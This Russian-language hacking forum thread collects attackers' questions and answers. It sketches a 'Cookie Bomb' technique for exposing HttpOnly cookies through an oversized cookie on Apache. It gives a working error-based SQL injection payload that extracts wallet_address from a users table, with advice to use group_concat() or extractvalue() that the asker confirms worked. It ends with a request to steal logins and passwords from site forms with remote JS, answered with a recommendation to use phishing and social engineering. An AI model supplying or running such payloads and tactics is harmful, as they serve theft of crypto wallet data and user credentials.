Есть такая узявимость как HTTP Only Cookie Disclosure. Я её ещё называю Cookie Bomb.

Работает так:

1) Необходимо установить специальную cookie, название которой располагается ниже cookie, которую необходимо скомпрометировать, при условии упорядочивания их в алфавитном порядке.

2) Специальная cookie должна состоять из более чем 10000 символов для вызова уязвимости в версии Apache

А Ajax и метод XMLHTTPResponse не работают?

почему бы им не работать?

Это бы как бы вопрос-уточнение . Спасибо.

делаю такой запрос (SELECT 1 and ROW(1,1)>(select count(*),concat((SELECT wallet_address FROM users WHERE user_id = 1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

но в ответ получаю

Subquery returns more than 1 row

как вытащить wallet_address (34 символа)?

спасибо

выводите через extractvalue() или попробуйте обернуть колонку в group_concat()

спасибо group_concat() помогло

Есть сайт такого типа

Форма логина такая -

----------------------------------------------------------------------------------------------------------------

Форма пароля такая -

----------------------------------------------------------------------------------------------------------------

Можно ли удаленным js воровать логи и пароли из этих форм ?кража кук не подходит т.к httponly не обходится.((Или что еще можно придумать?Заранее спс

Картинка была нарисована в paint ,просто порисовать захотелось)))

Можно, применяйте фишинг и социальную инженерию. Не обязательно использовать javascript, достаточно html разметки